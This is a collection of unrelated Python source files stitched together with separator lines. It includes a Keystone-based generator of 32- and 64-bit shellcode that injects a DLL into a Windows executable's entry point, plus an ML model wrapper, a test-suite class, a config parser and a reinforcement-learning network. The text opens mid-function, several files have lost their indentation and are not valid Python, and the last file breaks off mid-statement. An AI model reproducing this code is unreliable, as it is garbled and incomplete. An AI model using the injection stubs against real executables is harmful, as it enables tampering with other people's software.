data[np.isnan(data)] = 0
return data
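if __name__ == '__main__':
    # Minimal self-check sketch for Scaler on made-up data (illustrative only):
    # a fitted transform followed by inverse_transform should round-trip.
    _demo = np.array([1.0, 2.0, 3.0, 4.0])
    _scaler = Scaler()
    _scaler.fit(_demo)
    _normed = _scaler.transform(_demo)
    assert np.allclose(_scaler.inverse_transform(_normed), _demo)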
|
55946
|
import os
import sys
from keystone import *
sys.path.append("./../../util/script/")
import shellcode
def gen_oepinit_code32():
ks = Ks(KS_ARCH_X86, KS_MODE_32)
code_str = f"""
// for relative address, get the base of addr
push ebx;
call getip;
lea ebx, [eax-6];
// get the imagebase
mov eax, 0x30; // to avoid relative addressing
mov edi, dword ptr fs:[eax]; //peb
mov edi, [edi + 0ch]; //ldr
mov edi, [edi + 14h]; //InMemoryOrderLoadList, this
mov edi, [edi -8h + 18h]; //this.DllBase
// get loadlibrarya, getprocaddress
mov eax, [ebx + findloadlibrarya];
add eax, edi;
call eax;
mov [ebx + findloadlibrarya], eax;
mov eax, [ebx + findgetprocaddress];
add eax, edi;
call eax;
mov [ebx + findgetprocaddress], eax;
// reloc
mov eax, [ebx + dllrva];
add eax, edi;
push eax;
push eax;
mov eax, [ebx + memrelocrva];
add eax, edi;
call eax;
// bind iat
mov eax, [ebx + findgetprocaddress];
push eax; // arg3, getprocaddress
mov eax, [ebx + findloadlibrarya];
push eax; // arg2, loadlibraryas
mov eax, [ebx + dllrva];
add eax, edi;
push eax; // arg1, dllbase value
mov eax, [ebx + membindiatrva];
add eax, edi
call eax;
// bind tls
xor eax, eax;
inc eax;
push eax; // arg2, reason for tls
mov eax, [ebx + dllrva]
add eax, edi;
push eax; // arg1, dllbase
mov eax, [ebx + membindtlsrva];
add eax, edi;
call eax;
// call dll oep, for dll entry
xor eax, eax;
push eax; // lpvReserved
inc eax;
push eax; // fdwReason, DLL_PROCESS_ATTACH
mov eax, [ebx + dllrva];
add eax, edi;
push eax; // hinstDLL
mov eax, [ebx + dlloeprva];
add eax, edi;
call eax;
// jmp to origin oep
mov eax, [ebx + exeoeprva];
add eax, edi;
pop ebx;
jmp eax;
getip:
mov eax, [esp]
ret
exeoeprva: nop;nop;nop;nop;
dllrva: nop;nop;nop;nop;
dlloeprva: nop;nop;nop;nop;
memrelocrva: nop;nop;nop;nop;
membindiatrva: nop;nop;nop;nop;
membindtlsrva: nop;nop;nop;nop;
findloadlibrarya: nop;nop;nop;nop;
findgetprocaddress: nop;nop;nop;nop;
"""
# print("gen_oepinit_code32", code_str)
payload, _ = ks.asm(code_str)
# print("payload: ", [hex(x) for x in payload])
return payload
def gen_oepinit_code64():
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code_str = f"""
// for relative address, get the base of addr
call getip;
lea rbx, [rax-5];
push rcx;
push rdx;
push r8;
push r9;
sub rsp, 0x28; // this is for memory 0x10 align
// get the imagebase
mov rax, 0x60; // to avoid relative addressing
mov rdi, qword ptr gs:[rax]; //peb
mov rdi, [rdi + 18h]; //ldr
mov rdi, [rdi + 20h]; //InMemoryOrderLoadList, this
mov rdi, [rdi -10h + 30h]; //this.DllBase
// get loadlibrarya, getprocaddress
mov rax, [rbx + findloadlibrarya];
add rax, rdi;
call rax;
mov [rbx + findloadlibrarya], rax;
mov rax, [rbx + findgetprocaddress];
add rax, rdi;
call rax;
mov [rbx + findgetprocaddress], rax;
// reloc
mov rcx, [rbx + dllrva];
add rcx, rdi;
mov rdx, rcx;
mov rax, [rbx + memrelocrva];
add rax, rdi;
call rax;
// bind iat
mov r8, [rbx + findgetprocaddress]; // arg3, getprocaddress
mov rdx, [rbx + findloadlibrarya]; // arg2, loadlibraryas
mov rcx, [rbx + dllrva];
add rcx, rdi; // arg1, dllbase value
mov rax, [rbx + membindiatrva];
add rax, rdi
call rax;
// bind tls
xor rdx, rdx;
inc rdx; // argc, reason for tls
mov rcx, [rbx + dllrva]
add rcx, rdi; // arg1, dllbase
mov rax, [rbx + membindtlsrva];
add rax, rdi;
call rax;
// call dll oep, for dll entry
xor r8, r8; // lpvReserved
xor rdx, rdx;
inc rdx; // fdwReason, DLL_PROCESS_ATTACH
mov rcx, [rbx + dllrva];
add rcx, rdi; // hinstDLL
mov rax, [rbx + dlloeprva];
add rax, rdi;
call rax;
// jmp to origin oep
add rsp, 0x28;
pop r9;
pop r8;
pop rdx;
pop rcx;
mov rax, [rbx+exeoeprva];
add rax, rdi;
jmp rax;
getip:
mov rax, [rsp]
ret
exeoeprva: nop;nop;nop;nop;nop;nop;nop;nop;
dllrva: nop;nop;nop;nop;nop;nop;nop;nop;
dlloeprva: nop;nop;nop;nop;nop;nop;nop;nop;
memrelocrva: nop;nop;nop;nop;nop;nop;nop;nop;
membindiatrva: nop;nop;nop;nop;nop;nop;nop;nop;
membindtlsrva: nop;nop;nop;nop;nop;nop;nop;nop;
findloadlibrarya: nop;nop;nop;nop;nop;nop;nop;nop;
findgetprocaddress: nop;nop;nop;nop;nop;nop;nop;nop;
"""
# print("gen_oepinit_code64", code_str)
payload, _ = ks.asm(code_str)
# print("payload: ", [hex(x) for x in payload])
return payload
def gen_oepinitstatic_code32():
ks = Ks(KS_ARCH_X86, KS_MODE_32)
code_str = f"""
push eax
push ebx
call getip;
lea ebx, [eax-7];
mov eax, [ebx + dllnameva];
push eax;
mov eax, [ebx + loadlibraryva]
call eax;
mov eax, [ebx + retva];
mov edi, eax;
pop ebx;
pop eax;
jmp edi;
getip:
mov eax, [esp]
ret
retva:nop;nop;nop;nop;
dllnameva:nop;nop;nop;nop;
loadlibraryva:nop;nop;nop;nop;
"""
payload, _ = ks.asm(code_str)
return payload
def gen_oepinitstatic_code64():
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code_str = f"""
push rax;
push rbx;
push rcx;
push rdx;
call getip;
lea rbx, [rax-9];
sub rsp, 0x28;
mov rcx, [rbx + dllnameva];
mov rax, [rbx + loadlibraryva]
call rax;
add rsp, 0x28;
mov rax, [rbx + retva];
mov r15, rax;
pop rdx;
pop rcx;
pop rbx;
pop rax;
jmp r15;
getip:
mov rax, [rsp];
ret;
retva:nop;nop;nop;nop;nop;nop;nop;nop;
dllnameva:nop;nop;nop;nop;nop;nop;nop;nop;
loadlibraryva:nop;nop;nop;nop;nop;nop;nop;nop;
"""
payload, _ = ks.asm(code_str)
return payload
def make_winpe_shellcode(libwinpepath, postfix):
codes = dict()
libwinpe = shellcode.extract_coff(libwinpepath)
# for static inject dll into exe oepinit code
codes[f'g_oepinit_code{postfix}'] = eval(f'gen_oepinit_code{postfix}()')
    # for dynamic inject dll into exe oepinit code
codes[f'g_oepinitstatic_code{postfix}'] = eval(f'gen_oepinitstatic_code{postfix}()')
for name, code in libwinpe.items():
newname = f"g_{name.replace('winpe_', '').lower()}_code{postfix}"
codes[newname] = code
return codes
def debug():
gen_oepinitstatic_code64()
codes = shellcode.extract_coff("./bin/winpe_shellcode32.obj")
pass
def main():
codes = dict()
codes.update(make_winpe_shellcode(sys.argv[1], '32'))
codes.update(make_winpe_shellcode(sys.argv[2], '64'))
shellcode.write_shellcode_header(codes, outpath=sys.argv[3])
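# Assumed invocation sketch (the output header path is an assumption; the .obj paths
# mirror the ones referenced in debug() above):
#   python <this_script>.py bin/winpe_shellcode32.obj bin/winpe_shellcode64.obj winpe_shellcode.h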
if __name__ == '__main__':
# debug()
main()
pass
|
55950
|
import pprint
import os
class ServerProps:
def __init__(self, filepath):
self.filepath = filepath
self.props = self._parse()
    def _parse(self):
        """Loads and parses the file specified in self.filepath"""
with open(self.filepath) as fp:
line = fp.readline()
d = {}
if os.path.exists(".header"):
os.remove(".header")
while line:
if '#' != line[0]:
s = line
s1 = s[:s.find('=')]
                if '\n' in s:
                    # strip the trailing newline from the value
                    s2 = s[s.find('=')+1:s.find('\n')]
                else:
                    s2 = s[s.find('=')+1:]
d[s1] = s2
else:
with open(".header", "a+") as h:
h.write(line)
line = fp.readline()
return d
def print(self):
"""Prints the properties dictionary (using pprint)"""
pprint.pprint(self.props)
def get(self):
"""Returns the properties dictionary"""
return self.props
def update(self, key, val):
"""Updates property in the properties dictionary [ update("pvp", "true") ] and returns boolean condition"""
if key in self.props.keys():
self.props[key] = val
return True
else:
return False
def save(self):
"""Writes to the new file"""
with open(self.filepath, "a+") as f:
f.truncate(0)
with open(".header") as header:
line = header.readline()
while line:
f.write(line)
line = header.readline()
header.close()
for key, value in self.props.items():
f.write(key + "=" + value + "\n")
if os.path.exists(".header"):
os.remove(".header")
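# Usage sketch (the file path and property values are assumptions):
# props = ServerProps("server.properties")
# props.update("pvp", "false")
# props.save()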
|
55971
|
from fairseq.models.transformer_lm import *
from torch.nn import CrossEntropyLoss
from typing import Any, Dict, List, Optional, Tuple
from torch import Tensor
class TransformerLanguageModelWrapper(TransformerLanguageModel):
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
# make sure all arguments are present in older models
base_lm_architecture(args)
if args.decoder_layers_to_keep:
args.decoder_layers = len(args.decoder_layers_to_keep.split(","))
if getattr(args, "max_target_positions", None) is None:
args.max_target_positions = getattr(
args, "tokens_per_sample", DEFAULT_MAX_TARGET_POSITIONS
)
if args.character_embeddings:
embed_tokens = CharacterTokenEmbedder(
task.source_dictionary,
eval(args.character_filters),
args.character_embedding_dim,
args.decoder_embed_dim,
args.char_embedder_highway_layers,
)
elif args.adaptive_input:
embed_tokens = AdaptiveInput(
len(task.source_dictionary),
task.source_dictionary.pad(),
args.decoder_input_dim,
args.adaptive_input_factor,
args.decoder_embed_dim,
options.eval_str_list(args.adaptive_input_cutoff, type=int),
args.quant_noise_pq,
args.quant_noise_pq_block_size,
)
else:
embed_tokens = cls.build_embedding(
args, task.source_dictionary, args.decoder_input_dim
)
if args.tie_adaptive_weights:
assert args.adaptive_input
assert args.adaptive_input_factor == args.adaptive_softmax_factor
assert (
args.adaptive_softmax_cutoff == args.adaptive_input_cutoff
), "{} != {}".format(
args.adaptive_softmax_cutoff, args.adaptive_input_cutoff
)
assert args.decoder_input_dim == args.decoder_output_dim
decoder = TransformerDecoderWrapper(
args, task.target_dictionary, embed_tokens, no_encoder_attn=True
)
return cls(decoder)
class TransformerDecoderWrapper(TransformerDecoder):
def __init__(self, args, dictionary, embed_tokens, no_encoder_attn=False):
super(TransformerDecoderWrapper, self).__init__(args, dictionary, embed_tokens, no_encoder_attn)
self.use_parallel = False
def predict(self, prev_output_tokens, inputs_embeds, attention_mask, labels,
encoder_out=None, incremental_state=None, full_context_alignment=False,
alignment_layer=None, alignment_heads=None):
prev_output_tokens = prev_output_tokens.to("cuda:0")
inputs_embeds = inputs_embeds.to("cuda:0")
# embed positions
positions = (
self.embed_positions(
prev_output_tokens, incremental_state=None
)
if self.embed_positions is not None
else None
)
prev_output_tokens = prev_output_tokens.to("cuda:0")
x = self.embed_scale * inputs_embeds
if self.quant_noise is not None:
x = self.quant_noise(x)
if self.project_in_dim is not None:
x = self.project_in_dim(x)
if positions is not None:
x += positions.to("cuda:0")
if self.layernorm_embedding is not None:
x = self.layernorm_embedding(x)
x = self.dropout_module(x)
x = x.transpose(0, 1)
self_attn_padding_mask = prev_output_tokens.eq(self.padding_idx)
# decoder layers
attn: Optional[Tensor] = None
#inner_states: List[Optional[Tensor]] = [x]
for idx, layer in enumerate(self.layers):
if incremental_state is None and not full_context_alignment:
self_attn_mask = self.buffered_future_mask(x)
else:
self_attn_mask = None
x, layer_attn, _ = layer(
x,
encoder_out.encoder_out if encoder_out is not None else None,
encoder_out.encoder_padding_mask if encoder_out is not None else None,
incremental_state,
self_attn_mask=self_attn_mask,
self_attn_padding_mask=self_attn_padding_mask,
need_attn=bool((idx == alignment_layer)),
need_head_weights=bool((idx == alignment_layer)),
)
#inner_states.append(x)
if layer_attn is not None and idx == alignment_layer:
attn = layer_attn.float().to(x)
if attn is not None:
if alignment_heads is not None:
attn = attn[:alignment_heads]
# average probabilities over heads
attn = attn.mean(dim=0)
x = x.to("cuda:0")
if self.layer_norm is not None:
x = self.layer_norm(x)
# T x B x C -> B x T x C
x = x.transpose(0, 1)
if self.project_out_dim is not None:
x = self.project_out_dim(x)
lm_logits = self.output_layer(x)
# Shift so that tokens < n predict n
shift_logits = lm_logits[..., :-1, :].contiguous()
if labels is not None:
shift_labels = labels[..., 1:].contiguous()
# Flatten the tokens
loss_fct = CrossEntropyLoss()
loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
# return loss, lm_logits
return lm_logits, loss
else:
return lm_logits, None
|
55984
|
from __future__ import print_function,absolute_import,division,unicode_literals
_B=False
_A=None
from .compat import no_limit_int
from .anchor import Anchor
if _B:from typing import Text,Any,Dict,List
__all__=['ScalarInt','BinaryInt','OctalInt','HexInt','HexCapsInt','DecimalInt']
class ScalarInt(no_limit_int):
def __new__(D,*E,**A):
F=A.pop('width',_A);G=A.pop('underscore',_A);C=A.pop('anchor',_A);B=no_limit_int.__new__(D,*E,**A);B._width=F;B._underscore=G
if C is not _A:B.yaml_set_anchor(C,always_dump=True)
return B
def __iadd__(A,a):B=type(A)(A+a);B._width=A._width;B._underscore=A._underscore[:]if A._underscore is not _A else _A;return B
def __ifloordiv__(A,a):B=type(A)(A//a);B._width=A._width;B._underscore=A._underscore[:]if A._underscore is not _A else _A;return B
def __imul__(A,a):B=type(A)(A*a);B._width=A._width;B._underscore=A._underscore[:]if A._underscore is not _A else _A;return B
def __ipow__(A,a):B=type(A)(A**a);B._width=A._width;B._underscore=A._underscore[:]if A._underscore is not _A else _A;return B
def __isub__(A,a):B=type(A)(A-a);B._width=A._width;B._underscore=A._underscore[:]if A._underscore is not _A else _A;return B
@property
def anchor(self):
A=self
if not hasattr(A,Anchor.attrib):setattr(A,Anchor.attrib,Anchor())
return getattr(A,Anchor.attrib)
def yaml_anchor(A,any=_B):
if not hasattr(A,Anchor.attrib):return _A
if any or A.anchor.always_dump:return A.anchor
return _A
def yaml_set_anchor(A,value,always_dump=_B):A.anchor.value=value;A.anchor.always_dump=always_dump
class BinaryInt(ScalarInt):
def __new__(A,value,width=_A,underscore=_A,anchor=_A):return ScalarInt.__new__(A,value,width=width,underscore=underscore,anchor=anchor)
class OctalInt(ScalarInt):
def __new__(A,value,width=_A,underscore=_A,anchor=_A):return ScalarInt.__new__(A,value,width=width,underscore=underscore,anchor=anchor)
class HexInt(ScalarInt):
def __new__(A,value,width=_A,underscore=_A,anchor=_A):return ScalarInt.__new__(A,value,width=width,underscore=underscore,anchor=anchor)
class HexCapsInt(ScalarInt):
def __new__(A,value,width=_A,underscore=_A,anchor=_A):return ScalarInt.__new__(A,value,width=width,underscore=underscore,anchor=anchor)
class DecimalInt(ScalarInt):
def __new__(A,value,width=_A,underscore=_A,anchor=_A):return ScalarInt.__new__(A,value,width=width,underscore=underscore,anchor=anchor)
|
55991
|
from __future__ import unicode_literals
from __future__ import print_function
from fnmatch import fnmatch
import sys
from unittest.suite import _call_if_exists, _DebugResult, _isnotsuite, TestSuite
from unittest import util
import unittest
from io import StringIO
from green.config import default_args
from green.output import GreenStream
from green.result import ProtoTest
class GreenTestSuite(TestSuite):
"""
This version of a test suite has two important functions:
1) It brings Python 3.x-like features to Python 2.7
2) It adds Green-specific features (see customize())
"""
args = None
def __init__(self, tests=(), args=None):
# You should either set GreenTestSuite.args before instantiation, or
# pass args into __init__
self._removed_tests = 0
self.allow_stdout = default_args.allow_stdout
self.full_test_pattern = "test" + default_args.test_pattern
self.customize(args)
super(GreenTestSuite, self).__init__(tests)
def addTest(self, test):
"""
Override default behavior with some green-specific behavior.
"""
if (
self.full_test_pattern
# test can actually be suites and things. Only tests have
# _testMethodName
and getattr(test, "_testMethodName", False)
# Fake test cases (generated for module import failures, for example)
# do not start with 'test'. We still want to see those fake cases.
and test._testMethodName.startswith("test")
):
if not fnmatch(test._testMethodName, self.full_test_pattern):
return
super(GreenTestSuite, self).addTest(test)
def customize(self, args):
"""
Green-specific behavior customization via an args dictionary from
the green.config module. If you don't pass in an args dictionary,
then this class acts like TestSuite from Python 3.x.
"""
# Set a new args on the CLASS
if args:
self.args = args
# Use the class args
if self.args and getattr(self.args, "allow_stdout", None):
self.allow_stdout = self.args.allow_stdout
if self.args and getattr(self.args, "test_pattern", None):
self.full_test_pattern = "test" + self.args.test_pattern
def _removeTestAtIndex(self, index):
"""
Python 3.x-like version of this function for Python 2.7's sake.
"""
test = self._tests[index]
if hasattr(test, "countTestCases"):
self._removed_tests += test.countTestCases()
self._tests[index] = None
def countTestCases(self):
"""
Python 3.x-like version of this function for Python 2.7's sake.
"""
cases = self._removed_tests
for test in self:
if test:
cases += test.countTestCases()
return cases
def _handleClassSetUpPre38(self, test, result): # pragma: nocover
previousClass = getattr(result, "_previousTestClass", None)
currentClass = test.__class__
if currentClass == previousClass:
return
if result._moduleSetUpFailed:
return
if getattr(currentClass, "__unittest_skip__", False): # pragma: no cover
return
try:
currentClass._classSetupFailed = False
except TypeError: # pragma: no cover
# test may actually be a function
# so its class will be a builtin-type
pass
setUpClass = getattr(currentClass, "setUpClass", None)
if setUpClass is not None:
_call_if_exists(result, "_setupStdout")
try:
setUpClass()
# Upstream Python forgets to take SkipTest into account
except unittest.case.SkipTest as e:
currentClass.__unittest_skip__ = True
currentClass.__unittest_skip_why__ = str(e)
# -- END of fix
except Exception as e: # pragma: no cover
if isinstance(result, _DebugResult):
raise
currentClass._classSetupFailed = True
className = util.strclass(currentClass)
errorName = "setUpClass (%s)" % className
self._addClassOrModuleLevelException(result, e, errorName)
finally:
_call_if_exists(result, "_restoreStdout")
def _handleClassSetUpPost38(
self, test, result
): # pragma: no cover -- because it's just like *Pre38
previousClass = getattr(result, "_previousTestClass", None)
currentClass = test.__class__
if currentClass == previousClass:
return
if result._moduleSetUpFailed:
return
if getattr(currentClass, "__unittest_skip__", False):
return
try:
currentClass._classSetupFailed = False
except TypeError:
# test may actually be a function
# so its class will be a builtin-type
pass
setUpClass = getattr(currentClass, "setUpClass", None)
if setUpClass is not None:
_call_if_exists(result, "_setupStdout")
try:
setUpClass()
# Upstream Python forgets to take SkipTest into account
except unittest.case.SkipTest as e:
currentClass.__unittest_skip__ = True
currentClass.__unittest_skip_why__ = str(e)
# -- END of fix
except Exception as e:
if isinstance(result, _DebugResult):
raise
currentClass._classSetupFailed = True
className = util.strclass(currentClass)
self._createClassOrModuleLevelException(
result, e, "setUpClass", className
)
finally:
_call_if_exists(result, "_restoreStdout")
if currentClass._classSetupFailed is True:
currentClass.doClassCleanups()
if len(currentClass.tearDown_exceptions) > 0:
for exc in currentClass.tearDown_exceptions:
self._createClassOrModuleLevelException(
result, exc[1], "setUpClass", className, info=exc
)
if sys.version_info < (3, 8): # pragma: no cover
_handleClassSetUp = _handleClassSetUpPre38
else:
_handleClassSetUp = _handleClassSetUpPost38
def run(self, result):
"""
Emulate unittest's behavior, with Green-specific changes.
"""
topLevel = False
if getattr(result, "_testRunEntered", False) is False:
result._testRunEntered = topLevel = True
for index, test in enumerate(self):
if result.shouldStop:
break
if _isnotsuite(test):
self._tearDownPreviousClass(test, result)
self._handleModuleFixture(test, result)
self._handleClassSetUp(test, result)
result._previousTestClass = test.__class__
if getattr(test.__class__, "_classSetupFailed", False) or getattr(
result, "_moduleSetUpFailed", False
):
continue
if not self.allow_stdout:
captured_stdout = StringIO()
captured_stderr = StringIO()
saved_stdout = sys.stdout
saved_stderr = sys.stderr
sys.stdout = GreenStream(captured_stdout)
sys.stderr = GreenStream(captured_stderr)
test(result)
if _isnotsuite(test):
if not self.allow_stdout:
sys.stdout = saved_stdout
sys.stderr = saved_stderr
result.recordStdout(test, captured_stdout.getvalue())
result.recordStderr(test, captured_stderr.getvalue())
# Since we're intercepting the stdout/stderr out here at the
# suite level, we need to poke the test result and let it know
# when we're ready to transmit results back up to the parent
# process. I would rather just do it automatically at test
# stop time, but we don't have the captured stuff at that
# point. Messy...but the only other alternative I can think of
# is monkey-patching loaded TestCases -- which could be from
# unittest or twisted or some other custom subclass.
result.finalize()
self._removeTestAtIndex(index)
# Green's subprocesses have handled all actual tests and sent up the
# result, but unittest expects to be able to add teardown errors to
# the result still, so we'll need to watch for that ourself.
errors_before = len(result.errors)
if topLevel:
self._tearDownPreviousClass(None, result)
self._handleModuleTearDown(result)
result._testRunEntered = False
# Special handling for class/module tear-down errors. startTest() and
# finalize() both trigger communication between the subprocess and
# the runner process. addError()
if errors_before != len(result.errors):
difference = len(result.errors) - errors_before
result.errors, new_errors = (
result.errors[:-difference],
result.errors[-difference:],
)
for (test, err) in new_errors:
# test = ProtoTest()
test.module = result._previousTestClass.__module__
test.class_name = result._previousTestClass.__name__
# test.method_name = 'some method name'
test.is_class_or_module_teardown_error = True
test.name = "Error in class or module teardown"
# test.docstr_part = 'docstr part' # error_holder.description
result.startTest(test)
result.addError(test, err)
result.stopTest(test)
result.finalize()
return result
|
55999
|
import base_network
import numpy as np
import ou_noise
import signal
import tensorflow as tf
import tensorflow.contrib.slim as slim
import util
def add_opts(parser):
    parser.add_argument('--share-conv-net', type=bool, default=True,
                        help="if set (dft) we have one network for processing input img that"
                        " is shared between value, l_value and output_action networks."
                        " if not set each net has its own network.")
parser.add_argument('--use-dropout', action='store_true',
help="if set use a dropout layer after flattened conv net output")
parser.add_argument('--discount', type=float, default=0.99,
help="discount for RHS of bellman equation update")
parser.add_argument('--action-noise-theta', type=float, default=0.01,
help="OrnsteinUhlenbeckNoise theta (rate of change) param for action"
" exploration")
parser.add_argument('--action-noise-sigma', type=float, default=0.1,
help="OrnsteinUhlenbeckNoise sigma (magnitude) param for action"
" exploration")
parser.add_argument('--action-init-weights', type=float, default=0.001,
help="init action final layer weights to (uniform) [-V, V]")
VERBOSE_DEBUG = False
def toggle_verbose_debug(signal, frame):
global VERBOSE_DEBUG
VERBOSE_DEBUG = not VERBOSE_DEBUG
signal.signal(signal.SIGUSR1, toggle_verbose_debug)
class ValueNetwork(base_network.Network):
    """ Value network component of a NAF network. Created as a separate net because it has a target network."""
def __init__(self, namespace, input_state, opts):
super(ValueNetwork, self).__init__(namespace)
with tf.variable_scope(namespace):
# do potential horizontal flipping of input state
# recall input is (batch, height, width, rgb) and we want to flip on width
flipped_input_state = tf.cond(base_network.FLIP_HORIZONTALLY,
lambda: tf.reverse(input_state, dims=[False, False, True, False]),
lambda: input_state)
# expose self.input_state_representation since it will be the network "shared"
# by l_value & output_action network when running --share-input-state-representation
self.conv_net_output = self.conv_net_on(flipped_input_state, opts)
self.hidden_layers = self.hidden_layers_on(self.conv_net_output, [100, 50])
self.value = slim.fully_connected(scope='fc',
inputs=self.hidden_layers,
num_outputs=1,
weights_regularizer=tf.contrib.layers.l2_regularizer(0.01),
activation_fn=None) # (batch, 1)
class NafNetwork(base_network.Network):
def __init__(self, namespace,
action_dim, opts):
super(NafNetwork, self).__init__(namespace)
# noise to apply to actions during rollouts
self.exploration_noise = ou_noise.OrnsteinUhlenbeckNoise(action_dim,
opts.action_noise_theta,
opts.action_noise_sigma)
# s1 and s2 placeholders
batched_state_shape = [None, opts.height, opts.width, 3]
self.input_state = tf.placeholder(shape=batched_state_shape, dtype=tf.uint8)
self.input_state_2 = tf.placeholder(shape=batched_state_shape, dtype=tf.uint8)
# value (and target value) sub networks
self.value_net = ValueNetwork("value", self.input_state, opts)
self.target_value_net = ValueNetwork("target_value", self.input_state_2, opts)
# build other placeholders
self.input_action = tf.placeholder(shape=[None, action_dim],
dtype=tf.float32, name="input_action")
self.reward = tf.placeholder(shape=[None, 1],
dtype=tf.float32, name="reward")
self.terminal_mask = tf.placeholder(shape=[None, 1],
dtype=tf.float32, name="terminal_mask")
self.importance_weight = tf.placeholder(shape=[None, 1],
dtype=tf.float32, name="importance_weight")
with tf.variable_scope(namespace):
# mu (output_action) is also a simple NN mapping input state -> action
# this is our target op for inference (i.e. value that maximises Q given input_state)
with tf.variable_scope("output_action"):
if opts.share_conv_net:
conv_net_output = self.value_net.conv_net_output
else:
                    conv_net_output = self.conv_net_on(self.input_state, opts)
hidden_layers = self.hidden_layers_on(conv_net_output, [100, 50])
weights_initializer = tf.random_uniform_initializer(-opts.action_init_weights, opts.action_init_weights)
self.output_action = slim.fully_connected(scope='fc',
inputs=hidden_layers,
num_outputs=action_dim,
weights_initializer=weights_initializer,
weights_regularizer=tf.contrib.layers.l2_regularizer(0.01),
activation_fn=tf.nn.tanh) # (batch, action_dim)
# do potentially horizontal flipping on action x (corresponding to
# an x-axis flip of input states)
input_action = tf.cond(base_network.FLIP_HORIZONTALLY,
lambda: self.input_action * tf.constant([-1.0, 1.0]),
lambda: self.input_action)
# A (advantage) is a bit more work and has three components...
# first the u / mu difference. note: to use in a matmul we need
# to convert this vector into a matrix by adding an "unused"
# trailing dimension
u_mu_diff = input_action - self.output_action # (batch, action_dim)
u_mu_diff = tf.expand_dims(u_mu_diff, -1) # (batch, action_dim, 1)
# next we have P = L(x).L(x)_T where L is the values of lower triangular
# matrix with diagonals exp'd. yikes!
# first the L lower triangular values; a network on top of the input state
num_l_values = (action_dim*(action_dim+1))/2
with tf.variable_scope("l_values"):
if opts.share_conv_net:
conv_net_output = self.value_net.conv_net_output
else:
                    conv_net_output = self.conv_net_on(self.input_state, opts)
hidden_layers = self.hidden_layers_on(conv_net_output, [100, 50])
l_values = slim.fully_connected(scope='fc',
inputs=hidden_layers,
num_outputs=num_l_values,
weights_regularizer=tf.contrib.layers.l2_regularizer(0.01),
activation_fn=None)
# we will convert these l_values into a matrix one row at a time.
rows = []
self._l_values = l_values
# each row is made of three components;
# 1) the lower part of the matrix, i.e. elements to the left of diagonal
# 2) the single diagonal element (that we exponentiate)
# 3) the upper part of the matrix; all zeros
batch_size = tf.shape(l_values)[0]
row_idx = 0
for row_idx in xrange(action_dim):
row_offset_in_l = (row_idx*(row_idx+1))/2
lower = tf.slice(l_values, begin=(0, row_offset_in_l), size=(-1, row_idx))
diag = tf.exp(tf.slice(l_values, begin=(0, row_offset_in_l+row_idx), size=(-1, 1)))
upper = tf.zeros((batch_size, action_dim - tf.shape(lower)[1] - 1)) # -1 for diag
rows.append(tf.concat(1, [lower, diag, upper]))
# full L matrix is these rows packed.
L = tf.pack(rows, 0)
# and since leading axis in l was always the batch
# we need to transpose it back to axis0 again
L = tf.transpose(L, (1, 0, 2)) # (batch_size, action_dim, action_dim)
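            # Illustrative shape note for action_dim == 2: each batch row of l_values is
            # [a, b, c]; the loop above builds L = [[exp(a), 0], [b, exp(c)]], so the
            # P = L.L^T computed below is symmetric positive definite.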
self.check_L = tf.check_numerics(L, "L")
# P is L.L_T
L_T = tf.transpose(L, (0, 2, 1)) # TODO: update tf & use batch_matrix_transpose
P = tf.batch_matmul(L, L_T) # (batch_size, action_dim, action_dim)
# can now calculate advantage
u_mu_diff_T = tf.transpose(u_mu_diff, (0, 2, 1))
advantage = -0.5 * tf.batch_matmul(u_mu_diff_T, tf.batch_matmul(P, u_mu_diff)) # (batch, 1, 1)
# and finally we need to reshape off the axis we added to be able to matmul
self.advantage = tf.reshape(advantage, [-1, 1]) # (batch, 1)
# Q is value + advantage
self.q_value = self.value_net.value + self.advantage
# target y is reward + discounted target value
self.target_y = self.reward + (self.terminal_mask * opts.discount * \
self.target_value_net.value)
self.target_y = tf.stop_gradient(self.target_y)
# loss is squared difference that we want to minimise rescaled by important weight
self.loss = tf.pow(self.q_value - self.target_y, 2)
rescaled_loss = self.loss * self.importance_weight
with tf.variable_scope("optimiser"):
# dynamically create optimiser based on opts
optimiser = util.construct_optimiser(opts)
# calc gradients
gradients = optimiser.compute_gradients(tf.reduce_mean(rescaled_loss))
# potentially clip and wrap with debugging tf.Print
gradients, self.print_gradient_norms = util.clip_and_debug_gradients(gradients, opts)
# apply
self.train_op = optimiser.apply_gradients(gradients)
# sanity checks (in the dependent order)
checks = []
for op, name in [(l_values, 'l_values'), (L,'L'), (self.loss, 'loss')]:
checks.append(tf.check_numerics(op, name))
self.check_numerics = tf.group(*checks)
def setup_target_network(self):
self.target_value_net.set_as_target_network_for(self.value_net, 0.01)
def action_given(self, state, add_noise):
# NOTE: noise is added _outside_ tf graph. we do this simply because the noisy output
# is never used for any part of computation graph required for online training. it's
        # only used during training after being stored in the replay buffer.
actions = tf.get_default_session().run(self.output_action,
feed_dict={self.input_state: [state],
base_network.IS_TRAINING: False,
base_network.FLIP_HORIZONTALLY: False})
if add_noise:
if VERBOSE_DEBUG:
pre_noise = str(actions)
actions[0] += self.exploration_noise.sample()
            actions = np.clip(actions, -1, 1) # action output is _always_ (-1, 1)
if VERBOSE_DEBUG:
print "TRAIN action_given pre_noise %s post_noise %s" % (pre_noise, actions)
return map(float, np.squeeze(actions))
def train(self, batch):
flip_horizontally = np.random.random() < 0.5
if VERBOSE_DEBUG:
print "batch.action"
print batch.action.T
print "batch.reward", batch.reward.T
print "batch.terminal_mask", batch.terminal_mask.T
print "flip_horizontally", flip_horizontally
print "weights", batch.weight.T
values = tf.get_default_session().run([self._l_values, self.value_net.value,
self.advantage, self.target_value_net.value,
self.print_gradient_norms],
feed_dict={self.input_state: batch.state_1,
self.input_action: batch.action,
self.reward: batch.reward,
self.terminal_mask: batch.terminal_mask,
self.input_state_2: batch.state_2,
self.importance_weight: batch.weight,
base_network.IS_TRAINING: True,
base_network.FLIP_HORIZONTALLY: flip_horizontally})
values = [np.squeeze(v) for v in values]
print "_l_values", values[0].T
print "value_net.value ", values[1].T
print "advantage ", values[2].T
print "target_value_net.value ", values[3].T
_, _, l = tf.get_default_session().run([self.check_numerics, self.train_op,
self.loss],
feed_dict={self.input_state: batch.state_1,
self.input_action: batch.action,
self.reward: batch.reward,
self.terminal_mask: batch.terminal_mask,
self.input_state_2: batch.state_2,
self.importance_weight: batch.weight,
base_network.IS_TRAINING: True,
